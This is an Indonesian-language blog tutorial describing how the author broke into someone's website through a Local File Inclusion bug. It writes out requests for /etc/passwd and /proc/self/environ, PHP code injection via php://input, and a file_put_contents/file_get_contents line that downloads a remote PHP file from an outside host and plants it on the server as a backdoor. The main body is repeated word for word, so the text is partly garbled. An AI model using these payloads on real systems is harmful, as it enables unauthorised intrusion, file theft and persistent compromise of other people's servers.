MENCOBA MEMASUKI WEBSITE DENGAN BUG LFI
Hello Sahabat IF 😀
Kali ini saya ingin menuliskan, cara memasuki website dengan memanfaat kan BUG LFI, kali ini saya menemukan nya dengan cara saya sendiri, meng-Upload file dengan "php://input".
Saya telah menemukan website nya yang memiliki BUG LFI, lihat pada gambar di bawah.
gambar itu menandakan memiliki BUG LFI, "Menurut saya yang ada berkaitan nya dengan (include) itu adalah bug dari LFI".
Langsung saya coba mengganti nya dengan "index.php?page=/etc/passwd", setelah saya coba dan ternyata tidak bisa membaca file "passwd" nya. bukan berarti tidak bisa membaca file "passwd" itu tidak vuln, dan saya mencoba dengan yang lain "index.php?page=/proc/self/environ" untuk upload "Backdoor" sama saja tidak bisa membaca file "environ". di situ saya belom menyerah.
Lalu saya mencoba cara "php://input", saya mencoba apakah code PHP dapat di jalankan menggunakan "php://input", pertama saya mencoba nya dengan "<?php phpinfo(); ?>" dan benar saja code PHP dapat di jalan kan.
Lalu saya mencoba code yang lain "<?php system("ls -la"); ?>" server telah menonaktifkan "system()"
Tadi nya saya ingin mengUpload file dengan menggunakan fungsi "system()" namun karena tidak bisa, saya mencobakan cara lain. Saya mencoba nya dengan cara "file_put_contents" dan "file_get_contents", di sini saya harus mencari Folder Writetable nya, saya menemukan Folder Writetable nya dengan cara "scandir()" *Saya menemukan path nya pada error di awal tadi.
Saya mencoba Folder "test" lalu saya mencoba mengUpload dengan cara "file_put_contents" dan "file_get_contents". Code php nya seperti ini :
<?php
var_dump(file_put_contents(__DIR__./"filenya.php", file_get_contents("http://disini.com/isifilenya.txt")));
?>
setelah itu saya coba "Execute" dan menjadi blank, mungkin blank itu pertanda keberhasilan dalam mengUpload file(code PHP) diatas tadi.
Setelah berhasil, saya coba membuka file yang saya Upload tadi dan benar saja file(code PHP) itu terUpload pada website nya.
Kali ini saya ingin menuliskan, cara memasuki website dengan memanfaat kan BUG LFI, kali ini saya menemukan nya dengan cara saya sendiri, meng-Upload file dengan "php://input".
Saya telah menemukan website nya yang memiliki BUG LFI, lihat pada gambar di bawah.
gambar itu menandakan memiliki BUG LFI, "Menurut saya yang ada berkaitan nya dengan (include) itu adalah bug dari LFI".
Langsung saya coba mengganti nya dengan "index.php?page=/etc/passwd", setelah saya coba dan ternyata tidak bisa membaca file "passwd" nya. bukan berarti tidak bisa membaca file "passwd" itu tidak vuln, dan saya mencoba dengan yang lain "index.php?page=/proc/self/environ" untuk upload "Backdoor" sama saja tidak bisa membaca file "environ". di situ saya belom menyerah.
Lalu saya mencoba cara "php://input", saya mencoba apakah code PHP dapat di jalankan menggunakan "php://input", pertama saya mencoba nya dengan "<?php phpinfo(); ?>" dan benar saja code PHP dapat di jalan kan.
Lalu saya mencoba code yang lain "<?php system("ls -la"); ?>" server telah menonaktifkan "system()"
Tadi nya saya ingin mengUpload file dengan menggunakan fungsi "system()" namun karena tidak bisa, saya mencobakan cara lain. Saya mencoba nya dengan cara "file_put_contents" dan "file_get_contents", di sini saya harus mencari Folder Writetable nya, saya menemukan Folder Writetable nya dengan cara "scandir()" *Saya menemukan path nya pada error di awal tadi.
Saya mencoba Folder "test" lalu saya mencoba mengUpload dengan cara "file_put_contents" dan "file_get_contents". Code php nya seperti ini :
<?php
var_dump(file_put_contents(__DIR__./"filenya.php", file_get_contents("http://disini.com/isifilenya.txt")));
?>
setelah itu saya coba "Execute" dan menjadi blank, mungkin blank itu pertanda keberhasilan dalam mengUpload file(code PHP) diatas tadi.
Setelah berhasil, saya coba membuka file yang saya Upload tadi dan benar saja file(code PHP) itu terUpload pada website nya.
Cukup Sekian tutorial saya hari ini. apabila ada kesalahan Mohon di maafkan,
Hormat saya Member LocalHOST @ Tersakiti
0 Response to "MENCOBA MEMASUKI WEBSITE DENGAN BUG LFI"
Post a Comment
Terima kasih sudah membaca artikel yang saya buat. 👊😎
Silahkan komen kritik / saran untuk membantu saya agar artikel selanjutnya dapat lebih baik lagi.
Perhatian : Mohon untuk tidak komen menggunakan kata kasar !
Terima kasih🙏